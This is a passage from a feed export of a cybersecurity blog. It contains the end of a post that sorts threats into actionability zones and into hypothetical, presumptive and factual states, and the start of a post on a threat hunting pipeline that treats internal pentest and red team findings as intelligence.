2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Actionability zones indicate how deserving a cluster of threats is, of your finite human-resourced computing time.</p><p>Zones are more ambiguous than funnels. <strong>Because of this, they also capture higher degrees of complexity</strong>. Zones can represent areas or regions within a larger space, boundaries between these zones can sometimes be less evident. Zones can also overlap, threshold spaces open up between boundaries, where perimeters create an interplay betwixt the "inside" and the "outside".</p><p><strong>Actionability Zones</strong> remove pressure from the threat intelligence collection phase since the collection is meant to be broad but tailored, directed but curious, targeted to your industry vertical, geopolitical dynamics, services, or strategic goals, but broad enough that you won't make premature determinations regarding its usefulness, risking to exclude that which could be very important to you in the next phase (analysis).</p><p>More actionable zones still have the least actionable zones as an extended perimeter. There are still threats surrounding our implementation zone that deserve further analysis and threats in our analysis zone that deserve heightened monitoring, we might not do something about them now, but might do so in the near future.</p><p>The digital infrastructure of many businesses out there can be very complex, hybrid architecture, multi-cloud environments, multiple operative systems and OS versions, dispersed workforce, changing requirements, etc. turn these infrastructures into highly volatile environments (<strong>environmental volatility</strong> is one of the three tactical disadvantages of cyber defenders, something I will address in future epistles).</p><p>During your analysis phase, you may have discarded information regarding specific vulnerabilities or adversarial techniques thinking they don't apply to your digital systems, only to find out a couple of days later that someone in the organization has just deployed the very system that is targeted by those attacks. <strong>Threats coexist, just like zones</strong>.</p><p>But how should we classify threats in terms of the evidence we have about them? Not all threats are known to the same degree, some remain mostly obscure to organizational reasoning, some are anticipated but not much is known about them, and some have prolific open-source information making them highly transparent to threat intelligence functions out there.</p><p>It is important to understand these differences since our degrees of confidence are rationally constrained by our evidence. In turn, this guides our allocation of resources: it is extremely rare for an organization to allocate high quantities of manpower to deploy security controls for threats that are vaguely understood.</p><p>Based on the availability of information regarding threats, we could categorize them into three <strong><a href="https://en.wiktionary.org/wiki/epistemic">epistemic</a> states of information</strong>:</p><ol><li><p><strong>Hypothetical threats | Actionability factor: Low | Recommended action: Monitor</strong>.<br>These are threats that could potentially impact your organization. Their actionability is low mainly because you have not yet fully qualified them to understand whether they are applicable to your attack surface or not. This is also the reason why they mostly live in the future horizon. When I say hypothetical here, it means you really don't know whether they could or could not impact your business. You may not even know these threats are possible yet (like asking someone in the 1940s if we need quantum-resistant cryptography or if LLMs can help generate self-sustaining polymorphic malware).</p></li><li><p><strong>Presumptive threats | Actionability factor: Medium | Recommended action: Analyse</strong>.<br>These are threats you have decided to focus on, you have allocated resources to understand how they impact your attack surface. If you want to think about this in terms of a standard diamond model, these are threats that carry the potential to damage your business because there is an adversary who has a capability that can impact a vulnerability in your infrastructure.</p></li><li><p><strong>Factual threats | Actionability factor: high | Recommended action: Implement</strong>.<br>These are the threats that you have effectively brought under governance. You have aligned or updated your security controls to manage the threat to the best of your organizational capability.</p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lnAM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lnAM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 424w, https://substackcdn.com/image/fetch/$s_!lnAM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 848w, https://substackcdn.com/image/fetch/$s_!lnAM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 1272w, https://substackcdn.com/image/fetch/$s_!lnAM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lnAM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg" width="1456" height="1768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1768,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-horizons-ontology-01.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-horizons-ontology-01.excalidraw" title="threat-horizons-ontology-01.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!lnAM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 424w, https://substackcdn.com/image/fetch/$s_!lnAM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 848w, https://substackcdn.com/image/fetch/$s_!lnAM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 1272w, https://substackcdn.com/image/fetch/$s_!lnAM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecab4ca-215e-45e3-99bb-a5bcb61a77d9_631x766.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now please bear in mind, I have not yet even spoken about <strong>how</strong> those threats were classified and prioritized by your business.</p><p>We described actionability zones as fuzzy perimeters that indicate what are the best courses of action for different classes of threats, but <em>how are threats selected and optimally allocated to their corresponding zones so that we are addressing those threats that have contextual meaning within our business?</em></p><p>To explore this problem we will have to talk about how threat information relates to entropy and uncertainty about the cyber threats out there.</p><p>We will address this in the next articles in this series, stay tuned!</p>]]></content:encoded></item><item><title><![CDATA[The Threat Hunting Pipeline]]></title><description><![CDATA[Appetizer]]></description><link>https://www.quasarops.com/p/the-threat-hunting-pipeline</link><guid isPermaLink="false">https://www.quasarops.com/p/the-threat-hunting-pipeline</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sun, 17 Sep 2023 04:18:02 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/4dc3a65f-593b-4815-8152-b9f8a945f65b_2172x2367.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!053F!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!053F!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 424w, https://substackcdn.com/image/fetch/$s_!053F!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 848w, https://substackcdn.com/image/fetch/$s_!053F!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 1272w, https://substackcdn.com/image/fetch/$s_!053F!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!053F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg" width="2172" height="2367" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:2367,&quot;width&quot;:2172,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Threat Hunting Pipeline&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Threat Hunting Pipeline" title="The Threat Hunting Pipeline" srcset="https://substackcdn.com/image/fetch/$s_!053F!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 424w, https://substackcdn.com/image/fetch/$s_!053F!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 848w, https://substackcdn.com/image/fetch/$s_!053F!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 1272w, https://substackcdn.com/image/fetch/$s_!053F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcfbf63d-a1b2-4b86-87de-af304f3363d3_2172x2367.svg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">high level threat hunting pipeline, find the full SVG at <a href="https://github.com/darkquasar/AIMOD2/blob/main/content.en/diagrams/threat-hunting-pipeline/threat-hunting-pipeline-01.svg?ref=quasarops.com">https://github.com/darkquasar/AIMOD2/blob/main/content.en/diagrams/threat-hunting-pipeline/threat-hunting-pipeline-01.svg</a></figcaption></figure></div><h1>Appetizer</h1><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BfFf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BfFf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 424w, https://substackcdn.com/image/fetch/$s_!BfFf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 848w, https://substackcdn.com/image/fetch/$s_!BfFf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 1272w, https://substackcdn.com/image/fetch/$s_!BfFf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BfFf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Threat Hunting Pipeline&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Threat Hunting Pipeline" title="The Threat Hunting Pipeline" srcset="https://substackcdn.com/image/fetch/$s_!BfFf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 424w, https://substackcdn.com/image/fetch/$s_!BfFf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 848w, https://substackcdn.com/image/fetch/$s_!BfFf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 1272w, https://substackcdn.com/image/fetch/$s_!BfFf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc97dce29-fa50-4351-bd05-462ee91a8eb4_512x512.png 1456w" sizes="100vw"></picture><div></div></div></a><p>Ahoy fellow Cyberscouts! It's been a couple of weeks since our last encounter when I introduced an example of <a href="https://quasarops.com/citrix-cve-2023-3519-mission-plan/">an applied AIMOD2 hunt mission</a>, using Citrix CVE-2023-3519 as target.</p><p>What have I been doing since then you ask? Well, I've been building Active Cyber Defence capability at a global scale, by identifying the right structures and approaches that an organization can take to develop proactive threat detection and countermeasures.</p><p>Aside from that, I've been pondering hard around the question of "why" in threat detection. Why hunting for&nbsp;<em>this threat</em>&nbsp;and not&nbsp;<em>that threat</em>? Why create a detection&nbsp;<em>for x, y</em>,<em> and z</em>, as opposed to&nbsp;<em>b, c</em>,<em> and d</em>?</p><p>The perils of pondering this question for too long is that you may end up in&nbsp;<em>complete relativism</em>. But if you are curious enough, have tolerance for uncertainty, and avoid collapsing the space of possibilities too soon, there are treasures to be found. It is all about becoming a navigator of these complex times.</p><p>My reflection efforts have produced a blog post series around "<strong>The Problem of Why: Threat-Informed Prioritization in Hunting and Detection Engineering</strong>". These are not published yet, but if you stay tuned, your email client will surely let you know, unless, of course, you have flagged the&nbsp;<em>Tales of a CyberScout</em>&nbsp;as SPAM, for which I wouldn't blame you, to be honest &#128521;.</p><p>Today though is time for us to delve into a different topic. This epistle has been sitting in my Obsidian client for long enough and I believe it is time to finally publish it: <em>how does a threat hunting pipeline look like?</em></p><h1>The Intel Illusion</h1><p>Most threat hunting and detection engineering models are quick to state that threat hunting should be "threat-led". What they don't state is&nbsp;<em>what is that supposed to mean</em>.</p><p>Most people assume that leveraging threat intelligence for hunting and detection engineering simply means consuming feeds full of IOCs.&nbsp;<em>I am not sure what dark magic is operated to transform that into hunting hypotheses or missions</em>, but I'm sure there are archmages that can do that out there (perhaps some extreme data analytics comes to the rescue).</p><p>Some people think that leveraging intel for hunting and detection engineering is all about understanding external threat actor behaviour. That is tactics, techniques, and procedures that specific threat groups like&nbsp;<a href="https://attack.mitre.org/groups/G0016/?ref=quasarops.com">Cozy Bear</a>&nbsp;(APT29) exhibit in the "wild", which are captured by the big Cyber Consultancies and TI companies out there, then disseminated amongst the commoners.</p><p>Some other people (<em>yeah, my maths here are pretty loose: some + some = still some</em>), the very few, realize something crucial to any serious threat hunting program: EVERYTHING IS INTEL.</p><p>Let's say you run internal penetration tests and the testers find holes in your applications, big deal uh? What do you do with that information? You probably pass it on to a bunch of happy devs (uh... yeah, because those guys are mega happy about this news surely) who will go on their merry way and fix the vulnerability. Internal Patch Tuesdays.</p><p>And what else? Is that all you do with such an important piece of information? What about:</p><ul><li><p>understanding whether there are any threat actors that have been associated with exploiting the same bugs</p></li><li><p>running OSINT on the vulnerability type to understand correlations and connections to other bugs in a typical attack chain</p></li><li><p>passing that info to your operational blue teams to perform retrohunts, in order to understand whether anyone else has been able to exploit the same vulnerability in the past</p></li><li><p>collating this information into an internal vulnerability database to understand engineering patterns and how to improve them</p></li></ul><p>So you hire a Red Team to come and do an assessment of your security controls end-to-end. They setup a phishing structure, phish one of your employees with weaponized docos or credential harvesting. Deploy a C2, run BloodHound, identify attack vectors, move laterally, escalate privileges, obtain domain admin, exfiltrate data and achieve objectives. They completely, utterly pwnd you for the 5th time and everybody is raising risks left, right, and center.</p><p>What do you now do with that information? Raise a risk, fix things and job done?</p><p>What about, well... pretty much everything I just said for the pentest case, and then add:</p><ul><li><p>performing attack path modelling by leveraging&nbsp;<a href="https://mitre-engenuity.org/cybersecurity/center-for-threat-informed-defense/our-work/attack-flow/?ref=quasarops.com">Mitre Attack Flow</a></p></li><li><p>tracking adversarial emulation engagements as you would any other threat actor (even when they are not)</p></li><li><p>break down attack chain information to understand cyber deception opportunities</p></li></ul><p>And the list can go on.</p><p>The point is, if your notion of "intel" is merely reduced to external threat actors, then you are missing out on fantastic sources of intel right inside your perimeter.</p><p><strong>Don't get me wrong, intel that pertains to external threat actors is hugely relevant to blue teams, it belongs to the domain of predictive analytics and projected attack vectors.</strong></p><p>The awareness this brings to the business is core to any serious cyber security program. But by limiting your hunt pipeline to external sources of information, <em>you are blinded to the potential of derived analytics from internal sources</em>, which play an essential role in probing and responding to internal security controls and their breaches.</p><h1>The Active Defence Threat Hunting Pipeline</h1><p>So how do we evolve past the limitations of the abovementioned shortcomings? My small proposition is that we shift our mindset 360&#176;, not in a circle but in a spiral.</p><p>I always liked spirals more than circles.&nbsp;<em>A spiral is a combination of circular motion and linear motion</em>. The circular motion is what allows you to make the turn, while the linear motion allows you to progress along the spiral path.&nbsp;<strong>Spirals don't just represent cycles, they also represent quantum leaps, evolutions, dislocations</strong>.</p><p>Let's begin by assuming that&nbsp;<strong>EVERYTHING in our environment IS INTEL</strong>. It can be in a less refined or more refined state, more or less interconnected, more or less clustered, more or less coherent, but it can be considered&nbsp;<strong>a source</strong>&nbsp;of threat intelligence, in principle. We can have our classical philosophical debates in later epistles, I am aware that&nbsp;<a href="https://practicalpie.com/what-is-intelligence/?ref=quasarops.com">intelligence</a>&nbsp;involves more than merely disconnected data points.</p><p>To work on a threat hunting pipeline, we simply need to draw from&nbsp;<a href="https://aimod2.com/?ref=quasarops.com">AIMOD2</a>&nbsp;Framework&nbsp;<a href="https://aimod2.com/docs/02-threat-hunting-missions/threat-hunting-mission-structure/?ref=quasarops.com">CAPEO</a>&nbsp;model. It lays out the basic foundations not just of a hunt mission, but of an approach to the&nbsp;<strong>praxis of threat intelligence operationalization</strong>. In other words:&nbsp;<em>the practice of deriving actionability from contextually relevant threat intel</em>. Our initial threat hunting pipeline based on CAPEO would then look like this:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Kifa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Kifa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 424w, https://substackcdn.com/image/fetch/$s_!Kifa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 848w, https://substackcdn.com/image/fetch/$s_!Kifa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 1272w, https://substackcdn.com/image/fetch/$s_!Kifa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Kifa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg" width="631" height="781" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:781,&quot;width&quot;:631,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Threat Hunting Pipeline&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Threat Hunting Pipeline" title="The Threat Hunting Pipeline" srcset="https://substackcdn.com/image/fetch/$s_!Kifa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 424w, https://substackcdn.com/image/fetch/$s_!Kifa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 848w, https://substackcdn.com/image/fetch/$s_!Kifa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 1272w, https://substackcdn.com/image/fetch/$s_!Kifa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0521db42-ff79-4619-bc74-3df255cc5f79_631x781.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" 